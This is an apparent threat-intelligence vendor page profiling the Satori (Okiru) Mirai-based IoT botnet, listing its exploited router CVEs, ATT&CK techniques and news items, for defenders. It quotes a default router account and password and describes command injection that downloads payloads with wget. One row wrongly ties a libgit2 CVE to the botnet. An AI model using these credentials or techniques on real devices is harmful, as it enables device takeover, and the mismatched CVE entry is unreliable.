Skip to main content
Live Webinar with SANS (June 25)— Agentic CTI Automation for Fun & ProfitRegister Free
Mallory
Back to malware
MalwareExploits 5 CVEs

Satori

Satori is a Mirai-based IoT botnet, also referred to as Okiru, first identified in late 2017. It is known for extremely rapid propagation, with reporting in the provided content stating it infected more than 260,000 devices or routers within about 12 hours shortly after discovery. The malware targets internet-exposed routers and other embedded/IoT systems, particularly small-office/home-office and residential devices, and is used for botnet expansion and distributed denial-of-service activity.

The content directly associates Satori with exploitation of multiple router vulnerabilities. Reported infection vectors include the GPON router flaws CVE-2018-10561 and CVE-2018-10562 affecting DASAN Zhone Solutions devices, where Satori was observed incorporating the GPON exploit into later variants. The content also states Satori exploited a vulnerability in D-Link DSL-2750B devices, described elsewhere in the provided material as an OS command injection issue, and that it has been linked by Netlab 360 to exploitation of CVE-2018-10088 on Xiongmai devices. Additional reporting in the content says Satori appeared to target Huawei Home Gateway routers, and that its tradecraft has been referenced in relation to exploitation of Realtek/miniigd-exposed devices on port 52869.

Operationally, Satori is described as a Mirai-derived self-propagating botnet that scans for vulnerable IoT devices and integrates exploit code to compromise them at scale. One provided technical reference notes that Satori-style propagation included downloading and executing binaries for multiple CPU architectures to maximize infections. The malware is repeatedly discussed in the context of DDoS botnet ecosystems and modern Mirai variants.

High-confidence associations in the content include its classification as a Mirai variant/botnet, alias Okiru, rapid mass infection of routers, targeting of Huawei Home Gateway and other IoT/router platforms, and exploitation links to GPON vulnerabilities, D-Link DSL-2750B flaws, and CVE-2018-10088. No actor attribution beyond its placement in the broader Mirai-derived botnet ecosystem is directly established in the provided content.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial
EXPLOITED CVES

Vulnerabilities exploited

5 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

5 CVES
CVE-2018-10562Command Injection in Dasan GPON Home Routers diag_FormExploited in the wild

Satori Botnet — The infamous botnet that infected 260,000 devices in just 12 hours last year, Satori (also known as Okiru) has also been observed to include GPON exploit in its latest variant. | Gigabit-capable Passive Optical Network (GPON) routers manufactured by DASAN Zhone Solutions have been found vulnerable to an authentication bypass (CVE-2018-10561) and a root-RCE (CVE-2018-10562) flaws that eventually allow remote attackers to take full control of the device.

via the hacker newsthehackernews.com
CVE-2018-10561Dasan GPON Router Authentication Bypass via ?images ParameterExploited in the wild

Gigabit-capable Passive Optical Network (GPON) routers manufactured by DASAN Zhone Solutions have been found vulnerable to an authentication bypass (CVE-2018-10561) and a root-RCE (CVE-2018-10562) flaws that eventually allow remote attackers to take full control of the device. | Satori Botnet — The infamous botnet that infected 260,000 devices in just 12 hours last year, Satori (also known as Okiru) has also been observed to include GPON exploit in its latest variant.

via the hacker newsthehackernews.com
CVE-2014-8361Realtek SDK miniigd UPnP SOAP Command Injection

the first exploit used by Okiru is linked to the CVE-2014-8361... Devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command injection attacks in the UPnP SOAP interface.

via fortinet threat researchblog.fortinet.com
CVE-2018-10088Unauthenticated HTTP Login Stack Buffer Overflow in XiongMai uc-httpd 1.0.0

the botnet is co-located with a Xiongmai NVR/IP camera’s HTTP server... correlate three known vulnerabilities this server is affected by: CVE-2017-7577, CVE-2018-10088, and CVE-2022-45460... CVE-2018-10088, in particular, is already associated with the Satori, Hajime, and BotenaGo botnets.

via vulncheck blogvulncheck.com
CVE-2018-10888Out-of-bounds Read in libgit2 git_delta_apply (CVE-2018-10888)

CVE-2018-10888, in particular, is already associated with the Satori, Hajime, and BotenaGo botnets.

via vulncheck blogvulncheck.com
MITRE ATT&CK

Techniques & procedures

15 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

3 techniques
T1078Valid AccountsEvidence2

...have been found vulnerable to an authentication bypass (CVE-2018-10561)...

T1078.001Default AccountsEvidence1

After analysis, it appears the exploit is trying to use the default TR-064 account, which username is dslf-config and password is admin.

T1190Exploit Public-Facing ApplicationEvidence4

the first exploit used by Okiru is linked to the CVE-2014-8361... Devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command injection attacks in the UPnP SOAP interface.

Execution

2 techniques
T1059.004Unix ShellEvidence2

Note that a backquote character is used to inject OS commands. The “wget” command is used to perform an HTTP request to download the malicious payload and store it on the device as filename “c”.

T1203Exploitation for Client ExecutionEvidence3

...DASAN Zhone Solutions have been found vulnerable to an authentication bypass (CVE-2018-10561) and a root-RCE (CVE-2018-10562) flaws that eventually allow remote attackers to take full control of the device.

Persistence

2 techniques
T1078Valid AccountsEvidence2

...have been found vulnerable to an authentication bypass (CVE-2018-10561)...

T1078.001Default AccountsEvidence1

After analysis, it appears the exploit is trying to use the default TR-064 account, which username is dslf-config and password is admin.

Privilege Escalation

2 techniques
T1078Valid AccountsEvidence2

...have been found vulnerable to an authentication bypass (CVE-2018-10561)...

T1078.001Default AccountsEvidence1

After analysis, it appears the exploit is trying to use the default TR-064 account, which username is dslf-config and password is admin.

Stealth

2 techniques
T1078Valid AccountsEvidence2

...have been found vulnerable to an authentication bypass (CVE-2018-10561)...

T1078.001Default AccountsEvidence1

After analysis, it appears the exploit is trying to use the default TR-064 account, which username is dslf-config and password is admin.

Credential Access

2 techniques
T1110Brute ForceEvidence1

“Vector: Default credentials, unpatched firmware, exposed services (Telnet/SSH/HTTP APIs)”

T1110.003Password SprayingEvidence1

We suspect that these devices may have been infected not by Okiru’s worm capabilities, but by credential stuffing.

Discovery

1 technique
T1046Network Service DiscoveryEvidence4

FortiGuard Labs last week also began detecting strange scanning activities on uncommon TCP ports 52869 and 37215.

Lateral Movement

1 technique
T1210Exploitation of Remote ServicesEvidence1

“Mirai… Vector: Default credentials, unpatched firmware, exposed services (Telnet/SSH/HTTP APIs)” and “Aisuru… Automated scanning and exploitation of vulnerable IoT devices.”

Command and Control

5 techniques
T1071Application Layer ProtocolEvidence2

recent data reveals a worrying trend: the number of servers used to control botnets ... jumped by 24% in the last half of 2025.

T1105Ingress Tool TransferEvidence4

The “wget” command is used to perform an HTTP request to download the malicious payload and store it on the device as filename “c”. Then, the same kind of SOAP request, but with a modified command injection, is performed to execute the payload.

T1568.001Fast Flux DNSEvidence1

“Evasive command-and-control techniques, including domain-fluxing and encrypted command channels.”

T1568.002Domain Generation AlgorithmsEvidence1

"Evasive command-and-control techniques, including domain-fluxing and encrypted command channels"

T1573Encrypted ChannelEvidence1

"Evasive command-and-control techniques, including domain-fluxing and encrypted command channels"

Impact

1 technique
T1498Network Denial of ServiceEvidence2

These compromised computers can be used to initiate large-scale distributed denial-of-service (DDoS) attacks... Aisuru-Kimwolf is a botnet used to conduct large-scale DDoS attacks.

ACTIVITY FEED

Recent activity

13 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

13 SOURCESView more in app
the hacker newsNews
Apr 8, 2026
Masjesu Botnet Emerges as DDoS-for-Hire Service Targeting Global IoT Devices

A named DDoS botnet referenced as having previously used the same Realtek router targeting approach.

Read more
hackreadNews
Mar 25, 2026
Mirai Malware Evolves into Hundreds of Variants Driving Botnet Growth

A Mirai variant that infected large numbers of routers by exploiting a flaw in D-Link DSL-2750B devices.

Read more
pulsedive blogNews
Mar 24, 2026
The Operations of the Swarm: Inside the Complex World of Mirai-Based Botnets

Mirai-derived IoT botnet that spreads by exploiting remote code execution and command injection flaws in routers and similar edge devices, downloading architecture-specific payloads to maximize infections.

Read more
barracuda blogNews
Jan 29, 2026
Malware Brief: New wave of botnets driving DDoS chaos | Barracuda Networks Blog

A Mirai variant/fork referenced as part of the modern generation of IoT botnets used for DDoS, benefiting from Mirai-style automated exploitation and propagation across insecure IoT devices.

Read more
+9 more in the timeline
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
Start free trial
IOC matching

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities5

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping15

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.